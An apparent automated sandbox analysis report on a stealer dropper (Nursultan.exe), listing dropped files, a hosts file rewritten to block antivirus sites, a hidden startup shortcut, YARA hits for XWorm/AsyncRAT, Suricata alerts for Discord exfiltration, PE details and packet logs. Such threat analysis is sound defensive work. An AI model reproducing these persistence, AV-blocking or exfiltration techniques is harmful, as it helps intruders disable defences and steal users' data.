                                      Malicious:false
                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmp2945.tmp.dat

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):51200
                                      Entropy (8bit):0.8746135976761988
                                      Encrypted:false
                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmp29F2.tmp.tmpdb

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                      Category:dropped
                                      Size (bytes):98304
                                      Entropy (8bit):0.08235737944063153
                                      Encrypted:false
                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                      Malicious:false
                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Roaming\44\Information.txt

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):634
                                      Entropy (8bit):4.1659857078646425
                                      Encrypted:false
                                      SSDEEP:6:pYcCFWl4BjJ/Q/FVIK923fS+KRwSTeaOcMpDSQJY6u0GhS/rG1e7VMXjvPfA67X:pYzd/Gg7STevpOqY6V2MUe7VWTA6r
                                      MD5:2C45F7B812D088B54D89CD9CCD846558
                                      SHA1:4CC822A5D92D9712A5FE06C38D1AEC56D7779436
                                      SHA-256:02AABFADCA32ADD37A81D90892F770B6269B67B303291A9EF1B7495D0F61AFF7
                                      SHA-512:D82F7C330D40BC12A215FCB9857BAE3ED2E24AB3104E6D66DA8C151A9BFD555CBF7391E8CF8C210C4FB12071707E684477227F61E955199562D6BD46E434F211
                                      Malicious:false
                                      Preview: ==================================================. Operating system: Windows 10 Pro (64 Bit). PC user: 927537/user. ClipBoard: . Launch: C:\Users\user\AppData\Local\Temp\Insidious.exe. ==================================================. Screen resolution: 1280x1024. Current time: 06/09/2024 23:26:28. HWID: 6C5A2B7595. ==================================================. CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz. RAM: 4094MB. GPU: _ZC93PUYX. ==================================================. IP Geolocation: Fail Fail. Log Date: 09/06/2024 7:47. BSSID: 00:50:56:a7:21:15. ==================================================

                                      C:\Users\user\AppData\Roaming\44\Process.txt

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):4757
                                      Entropy (8bit):4.845597992083603
                                      Encrypted:false
                                      SSDEEP:24:XQUHIJ7J7J7J70qXsqJ70J7J7qJ7J7qJ7qJ7uJ7qQzuJ7qJ7qJ7J7xJ7J7J7xJ7H:AVMx1zRKz3vtTLXNpQtLPze
                                      MD5:189FAFC96CB93F9973827ABC5803756A
                                      SHA1:BDE81E36E2EA6B7158B8D34E1BCA35DB37437F6C
                                      SHA-256:C487C044F2A5C2352684FD0652D644E2B8F739BA0E92C1BBB99767151E477A51
                                      SHA-512:D1F9BCF1CA73DA010A6030B29C53FCEB5FADB4AACA3500D3BD6CA4483FDDA5DD4C35CD8730B0E9E097A7F103825B59FB6011AD719E981F233B943E7BD7C8661C
                                      Malicious:false
                                      Preview:NAME: svchost..NAME: RuntimeBroker..NAME: csrss..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: conhost..NAME: svchost..NAME: dllhost..NAME: svchost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: conhost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: svchost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: svchost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: svchost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: cmd..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: svchost..NAME: spoolsv..NAME: sihost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: svchost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: svchost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: fontdrvhost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: fontdrvhost..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: gzMWbGzGUvGIKZCZwnnYgAAsm..NAME: svchost..

                                      C:\Users\user\AppData\Roaming\44\Screen.png

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):519644
                                      Entropy (8bit):7.917372257001001
                                      Encrypted:false
                                      SSDEEP:12288:eNpmJapra/aHl4T5tOjgICmFeOgjj02SoyaFF8QQImYm07:1ApraSHmT7OjgTO2HyNQNjX7
                                      MD5:B92EB58AFF64853590AD7933C9483453
                                      SHA1:27D613E0D07AEBDD58AD6E33012F44548FC6EBEE
                                      SHA-256:1C25E1488463056B9063DCA6264C7B3F871C60D1F6076130C5493A6AD219A414
                                      SHA-512:CF530E7ECEA01F2136682C46623CD6549E1DB0702DF8BBDB251207643E522A6725F24A19468E792B0BF91801E1A6CB83B78A87F979ABDB1EEC607258EBF838E0
                                      Malicious:false
                                      Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....T........jzj.g....|k..'.W=.3S3.^w.....C......@..Y...."<...,....{#.. !.......G.y32.Ld.....s.>.....C....H..$U..ep..tn..$..{..X...Cb.......Qq..........?....*..{Z.wK.....;g..3V.p.|......T...h.7N.4.~.'%1.d.....9...9._.q.WO..?0...L......+.?...^:...$^..............y..9Ti...fH.;$...K.=u '~_..+..G....O...?./.z.!.^{.vU......3'..~..i..z%...M.*..uG.d........='.N....9.....m...T..p.....k.%...q...\..2$.n....xm6J...)xt...l*E..F....."f...>......G0..^...xDi.N.q..'5.5..'[.I..R.....1...Z..~.u.X.G6IaK...I>..>)..`..Z.u...k..a.yH.s....5..Z..VI....x....4.1A>...I5.)..1.C[.<.'.-ws.'u........C..q..w.....`.l.s.V8...3.j.....t_..\......o...5^..dS}=.9..K.k.$...>.....]^..+...z_.E......../h...3.j.....80.....u^a.o..l.X...=. .h.#....P.m....X.z.\....^.1.....C..4.}M.p/.E[.P.4...^[.S.4..BI...j.1...1.0W....5f..O.+^.../Qk..1...0..q....".g5..-D..A.qu..-.z/.5...ZG_km........

                                      C:\Users\user\AppData\Roaming\Microsoft Edge

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):212480
                                      Entropy (8bit):6.336877018807866
                                      Encrypted:false
                                      SSDEEP:3072:BXOsMDK0jn/VFJIYjbdU2BLOw5KRUGKXs+S++7KFSbxeY+qDDrMP:BoKc/Jjb6MJLGqStKEbxI
                                      MD5:C2A5CD7C5F8A633BAFB54B62CEE38077
                                      SHA1:033474BEFFB4C91158BD208EB80B39C0A26F6B2D
                                      SHA-256:DFCF3ED114355B554D2A3814946029C2688C4F617959B69375ED730250B9E9B1
                                      SHA-512:556A2CE11D01DE6C940306DA1A1D27BFE95EC52071A0762FD5F27FC5D9D4BE7BD50F9BC7DF922F483F8068783DD29CF81C9A492656DA21285C91404F1D603DDC
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Microsoft Edge, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Microsoft Edge, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Microsoft Edge, Author: ditekSHen
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 84%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................<..........^Z... ...`....@.. ....................................@..................................Z..O....`..J....................`....................................................... ............... ..H............text...d:... ...<.................. ..`.rsrc...J....`.......>..............@..@.reloc.......`.......<..............@..B................@Z......H........b..,.......&.....................................................(....*.r...p*. 6V=.*..(....*.rA..p*. ..e.*.s.........s.........s.........s.........*.r...p*. ....*.rA..p*.r...p*. ).,.*.rA..p*. {...*.r...p*. S...*..((...*.r7..p*. ....*.r...p*. ~.H.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rG..p*. .0..*.r...p*. ....*.rG..p*. ..r.*.r...p*. ....*.r...p*. .B..*.rm..p*. W...*.r...p*. .x

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Sep 6 22:47:39 2024, mtime=Fri Sep 6 22:47:39 2024, atime=Fri Sep 6 22:47:39 2024, length=212480, window=hide
                                      Category:dropped
                                      Size (bytes):778
                                      Entropy (8bit):5.020060746240808
                                      Encrypted:false
                                      SSDEEP:12:8Ji4fry88CcllsY//kELnqmjAZsHSunDWNMMM+mV:8Rfrp8blZsmnxALuniNMMM+m
                                      MD5:D44E0DB77C4F08E7C8E519C4F6F3BA73
                                      SHA1:1CE7D0679D759AAF3C9E782BF5D4C39E7420CE84
                                      SHA-256:DF0CF53F79D03992293DEA9A52C6871BB5F9C32827DE87E84E87D1F69597C80D
                                      SHA-512:C2752A68512655265828E6ED65DE014875D4E73F3667D07914A8509BDF8FF096D8147E914F2BFE8B2F00A2F3EA17057987610A3567F06B7490D81015900E61FB
                                      Malicious:false
                                      Preview:L..................F.... .....n(......n(......n(.....>......................z.:..DG..Yr?.D..U..k0.&...&...... M................(........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl&Y.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....&Y...Roaming.@......DWSl&Y.....C.....................=...R.o.a.m.i.n.g.....f.2..>..&Y.. .MICROS~2..N......&Y..&Y.......A....................F.M.M.i.c.r.o.s.o.f.t. .E.d.g.e.......]...............-.......\............_.7.....C:\Users\user\AppData\Roaming\Microsoft Edge........\.....\.....\.....\.....\.M.i.c.r.o.s.o.f.t. .E.d.g.e.`.......X.......927537...........hT..CrF.f4... .GG.e.l...,...W..hT..CrF.f4... .GG.e.l...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                      C:\Windows\System32\drivers\etc\hosts

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\Umbral.exe
                                      File Type:ASCII text, with CRLF, LF line terminators
                                      Category:dropped
                                      Size (bytes):2223
                                      Entropy (8bit):4.573013811987098
                                      Encrypted:false
                                      SSDEEP:48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
                                      MD5:C9901CB0AE22A9ABBD192B692AE4E2EB
                                      SHA1:12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
                                      SHA-256:3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
                                      SHA-512:E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
                                      Malicious:true
                                      Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.

                                      \Device\Null

                                      Download File
                                      Process:C:\Windows\System32\timeout.exe
                                      File Type:ASCII text, with CRLF line terminators, with overstriking
                                      Category:dropped
                                      Size (bytes):59
                                      Entropy (8bit):4.678921862774486
                                      Encrypted:false
                                      SSDEEP:3:hYFJKARcWmFsFJQZkOyn:hYFJXmFSQZkPn
                                      MD5:C43FC38F829B3C2CB4D7DB6E0FD40C08
                                      SHA1:54CD6E501D17F0CE9E6C0697D6AAD274ECDD5C74
                                      SHA-256:9D33CAB2F975129A4CD97D2348BCA16ED414647B5CE4C53FF3302D2CB26D11AB
                                      SHA-512:47CDDF4A52553D270B5EA9367012AEF4DCDB71767EA03E6164B8BBD2A5D93BB4A7406A493DAA4FF24EB41C59270E6BC1043CEC03299F84D36F44C4C87823295A
                                      Malicious:false
                                      Preview:..Waiting for 4 seconds, press CTRL+C to quit ....3.2.1.0..

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.993891283799074
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:Nursultan.exe
                                      File size:920'064 bytes
                                      MD5:ccfa4401df6dcaef4265f5edd06f3fde
                                      SHA1:f96f403087bb1ad5483bc68a5a3db8a1ca833f4e
                                      SHA256:366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4
                                      SHA512:02d1efcaaf84cd39c585359edc613daac7d6006adcd714b027d2f9ac5fe8184cb5cc7bb61762cd766d4f409149635d422d8a4b318970c6666e7caf2c16d208ac
                                      SSDEEP:24576:9tZhUkDINlUj3HMcggFUnCwCjsiD5udn3:9tZySIUj3HDgyUCrjsi
                                      TLSH:6515337E03DD8700D44E1D3863B74D1361A76A92B03EA38CBB4825CE1BAD6678DDB14B
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................n.... ... ....@.. .......................`............@................................

                                      File Icon

                                      Icon Hash:0f13ec78995d1f0e

                                      Static PE Info

                                      General

                                      Entrypoint:0x4e0c6e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66CEFAC5 [Wed Aug 28 10:24:05 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xe0c1c0x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xe20000x1634.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xe40000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xdec740xdee0015dab2e0d80f3b232d8463b9b14f3cdcFalse0.9958680945036456data7.996941736899731IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0xe20000x16340x18004e012386674edc404cbe5adca219bee2False0.4441731770833333data5.536812127006422IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xe40000xc0x200c73d664973261def0dbb4c24defbbff3False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0xe21300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.4817073170731707
                                      RT_GROUP_ICON0xe31d80x14data1.1
                                      RT_VERSION0xe31ec0x25cdata0.4652317880794702
                                      RT_MANIFEST0xe34480x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-09-07T01:47:46.654886+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549731208.95.112.180TCP
                                      2024-09-07T01:47:50.445728+02002045593ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)1192.168.2.549732162.159.135.232443TCP
                                      2024-09-07T01:48:02.808800+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549753208.95.112.180TCP
                                      2024-09-07T01:48:05.148671+02002045593ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)1192.168.2.549755162.159.136.232443TCP
                                      2024-09-07T01:48:16.913682+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549769208.95.112.180TCP
                                      2024-09-07T01:48:19.630044+02002045593ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)1192.168.2.549771162.159.135.232443TCP
                                      2024-09-07T01:48:29.257120+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549783208.95.112.180TCP
                                      2024-09-07T01:48:31.749098+02002045593ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)1192.168.2.549786162.159.135.232443TCP
                                      2024-09-07T01:48:41.243964+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549798208.95.112.180TCP
                                      2024-09-07T01:48:44.042997+02002045593ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)1192.168.2.549801162.159.136.232443TCP
                                      2024-09-07T01:48:54.528533+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549812208.95.112.180TCP
                                      2024-09-07T01:48:57.245974+02002045593ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)1192.168.2.549814162.159.138.232443TCP
                                      2024-09-07T01:49:09.463268+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549827208.95.112.180TCP
                                      2024-09-07T01:49:11.730189+02002045593ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST)1192.168.2.549828162.159.137.232443TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 7, 2024 01:47:01.665518045 CEST4970480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:01.670315981 CEST8049704208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:01.670401096 CEST4970480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:01.671267986 CEST4970480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:01.676065922 CEST8049704208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:02.147002935 CEST8049704208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:02.188129902 CEST4970480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:04.522553921 CEST49705443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:04.522589922 CEST44349705188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:04.522664070 CEST49705443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:04.564217091 CEST49705443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:04.564245939 CEST44349705188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:05.028460979 CEST44349705188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:05.028528929 CEST49705443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:05.038113117 CEST49705443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:05.038130999 CEST44349705188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:05.038367033 CEST44349705188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:05.078623056 CEST49705443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:05.105470896 CEST49705443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:05.148509026 CEST44349705188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:05.350684881 CEST44349705188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:05.350764036 CEST44349705188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:05.353059053 CEST49705443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:05.353867054 CEST49705443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:05.365514040 CEST49707443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:05.365547895 CEST44349707104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:05.369087934 CEST49707443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:05.369719028 CEST49707443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:05.369731903 CEST44349707104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:06.106219053 CEST44349707104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:06.108994961 CEST49707443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:06.122211933 CEST49707443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:06.122227907 CEST44349707104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:06.122500896 CEST44349707104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:06.137001038 CEST49707443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:06.180510044 CEST44349707104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:06.261421919 CEST44349707104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:06.261476040 CEST44349707104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:06.261503935 CEST44349707104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:06.261590004 CEST44349707104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:06.261614084 CEST49707443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:06.265645027 CEST49707443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:06.277971029 CEST49707443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:08.698299885 CEST4970880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:08.838443995 CEST8049708208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:08.838840008 CEST4970880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:08.838840008 CEST4970880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:08.843616009 CEST8049708208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:09.306864977 CEST8049708208.95.112.1192.168.2.5
